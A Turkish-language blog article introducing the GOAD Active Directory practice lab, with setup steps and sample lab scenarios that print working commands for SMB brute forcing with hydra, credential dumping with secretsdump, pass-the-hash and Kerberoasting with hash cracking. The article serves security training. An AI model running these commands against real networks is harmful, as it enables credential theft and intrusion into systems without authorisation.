İçindekiler

    Yazıyı Dinle

    Hazır
    Tarayıcınızın yerleşik ses sentezi özelliğini kullanır.

    Yazı Boyutu

    Küçük Aa
    Normal Aa
    Büyük Aa
    Çok Büyük Aa

    Kaydet

    📑

    Bu makaleyi daha sonra okumak için kaydedin

    Game of Active Directory

    Game of Active Directory
    Yazıyı dinlemek için oynat butonuna tıklayın

    Active Directory Güvenliği ve GOAD: Siber Güvenlikte Pratik Bir Laboratuvar

    Active Directory (AD), kurumsal ağların bel kemiğidir. Kimlik doğrulama, yetkilendirme ve kaynak yönetimi gibi kritik işlevleri üstlenen AD, siber saldırganların da başlıca hedefi haline gelmiştir. Peki, güvenlik uzmanları bu karmaşık sistemlere yönelik saldırıları nasıl öğrenebilir ve savunma stratejilerini nasıl geliştirebilir? İşte tam da bu noktada GOAD (Game of Active Directory), Orange Cyberdefense tarafından geliştirilen açık kaynaklı bir laboratuvar projesi, devreye giriyor.

    GOAD Nedir?

    GOAD, siber güvenlik uzmanlarına ve sızma testi meraklılarına gerçekçi bir Active Directory ortamı sunan, kullanıma hazır bir sanal laboratuvardır. Bu projenin temel amacı, kullanıcıların yaygın AD saldırı tekniklerini risksiz bir ortamda deneyimleyerek becerilerini geliştirmesini sağlamaktır.

    GOAD'ın Temel Özellikleri

    • Kullanıma Hazır Sanal Ortam: VMware, VirtualBox ve Vagrant desteğiyle çalışan GOAD, önceden yapılandırılmış sanal makineler (DC’ler, iş istasyonları) içerir.
    • Gerçekçi Senaryolar: Ortamda kasıtlı olarak bırakılan zafiyetler, aşağıdaki gibi saldırıların simüle edilmesine olanak tanır:
      • Kimlik Avı (Phishing) ve kimlik bilgisi hırsızlığı,
      • Yatay/Dikey Hareket teknikleri,
      • Golden Ticket ve Silver Ticket saldırıları,
      • ACL (Erişim Kontrol Listesi) istismarları.
    • Ücretsiz ve Erişilebilir: Açık kaynaklı olması, herkesin katkıda bulunmasına ve öğrenmesine olanak tanır.

    GOAD ile Neler Öğrenebilirsiniz?

    • Active Directory Temelleri: Domain Controller, Grup Politikaları (GPO), OU yapıları gibi AD bileşenlerini keşfedin.
    • Saldırı Yüzeyi Analizi: Zayıf şifre politikaları, fazla yetkilendirilmiş kullanıcı hesapları gibi riskleri tanımlayın.
    • Sızma Testi Araçları: Mimikatz, BloodHound, Impacket gibi araçları laboratuvarda güvenle kullanın.
    • Savunma Stratejileri: Saldırıları tespit etme ve engelleme yöntemlerini test edin.

    GOAD Kurulumu: 3 Adımda Laboratuvarınızı Ayağa Kaldırın

    1. Ön Koşullar

    • VMware, VirtualBox ve Vagrant kurulu olmalı.
    • 8 GB+ RAM ve yeterli depolama alanına sahip bir makine.

    2. Kodları İndirin

    bash
    git clone https://github.com/Orange-Cyberdefense/GOAD.git
    cd GOAD

    3. Sanal Makineleri Başlatın

    bash
    vagrant up
    Ansible playbook’ları otomatik olarak domain controller’ları, Windows/Linux makinelerini yapılandıracaktır.

    GOAD ile Örnek Sızma Testi Senaryoları

    1. İlk Erişim: Zayıf Şifreli Kullanıcı Hesabının Ele Geçirilmesi

    Amaç: Bir kullanıcı hesabının zayıf şifresini kırarak başlangıç erişimi sağlamak. Araçlar: nmaphydracrackmapexec Adımlar:
    1. Ağdaki SMB portlarını (445) tarayın:
      bash
      nmap -p 445 192.168.56.0/24
    2. Hydra ile brute-force saldırısı yapın (örnek kullanıcı: user1):
      bash
      hydra -l user1 -P /usr/share/wordlists/rockyou.txt smb://192.168.56.10
    3. Başarılı kimlik bilgileriyle oturum açın:
      bash
      crackmapexec smb 192.168.56.10 -u user1 -p 'Password123!'

    2. Lateral Movement: Pass-the-Hash ile Yatay Hareket

    Amaç: Ele geçirilen NTLM hash’i kullanarak başka bir makineye sıçramak. Araçlar: pth-winexesecretsdump.py (Impacket) Adımlar:
    1. Hash’i çıkarın (örnek hedef: WS01):
      bash
      secretsdump.py 'user1:Password123!@192.168.56.10'
    2. Elde edilen Administrator hash’i ile hedef makinede komut çalıştırın:
      bash
      pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:CCF3C6466D32D3B2A0413333F5C65809 //192.168.56.20 cmd

    3. Privilege Escalation: Kerberoasting ile Yetki Yükseltme

    Amaç: Service Principal Name (SPN) kayıtlı bir hesabın TGS biletini çalıp şifresini kırmak. Araçlar: GetUserSPNs.py (Impacket), hashcat Adımlar:
    1. SPN kayıtlı hesapları listeleyin:
      bash
      GetUserSPNs.py -dc-ip 192.168.56.10 LAB.LOCAL/user1:Password123! -request
    2. Çalınan hash’i hashcat ile kırın:
      bash
      hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

    Neden GOAD Tercih Edilmeli?

    • Zaman Tasarrufu: Laboratuvar kurulumu saatler süren bir işlemken, GOAD ile bu süre 10-15 dakikaya iner.
    • Gerçekçi Senaryolar: Gerçek dünyadaki saldırı tekniklerini birebir simüle eder.
    • Ücretsiz ve Erişilebilir: Açık kaynaklı olması, herkesin katkıda bulunmasına ve öğrenmesine olanak tanır.

    GOAD, siber güvenlik uzmanları için bir "oyun alanı" sunarak teorik bilgiyi pratiğe dökme fırsatı veriyor. Saldırı tekniklerini öğrenmek, savunma stratejilerini test etmek veya sertifikasyon sınavlarına hazırlanmak isteyenler için vazgeçilmez bir kaynak. Projeyi incelemek, katkıda bulunmak veya deneyimlerinizi paylaşmak için GOAD GitHub Repo’yu ziyaret edebilirsiniz. Unutmayın: “En iyi savunma, iyi bir saldırıyı anlamaktır!”
    #Siber Güvenlik #ActiveDirectory #SızmaTesti #GOAD #OrangeCyberdefense
    Önceki Yazı Windows Server 2008'den Windows Server 2012' DFL/FFL yükseltme işlemleri
    Windows Server 2008'den Windows Server 2012' DFL/FFL yükseltme işlemleri

    Windows Server 2008'den Windows Server 2012'ye Geçiş Süreci Windows Server 20...

    Sonraki Yazı PECmd ile Windows Prefetch Dosyalarının Adli Bilişim Analizi
    PECmd ile Windows Prefetch Dosyalarının Adli Bilişim Analizi

    Windows işletim sisteminde, programların daha hızlı başlatılmasına yardı...